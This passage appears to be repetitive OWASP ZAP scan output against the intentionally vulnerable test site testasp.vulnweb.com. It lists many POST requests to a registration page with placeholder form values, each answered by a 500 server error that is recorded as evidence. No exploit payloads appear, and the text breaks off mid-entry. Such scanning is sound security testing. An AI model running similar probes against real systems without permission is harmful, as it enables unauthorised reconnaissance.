| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
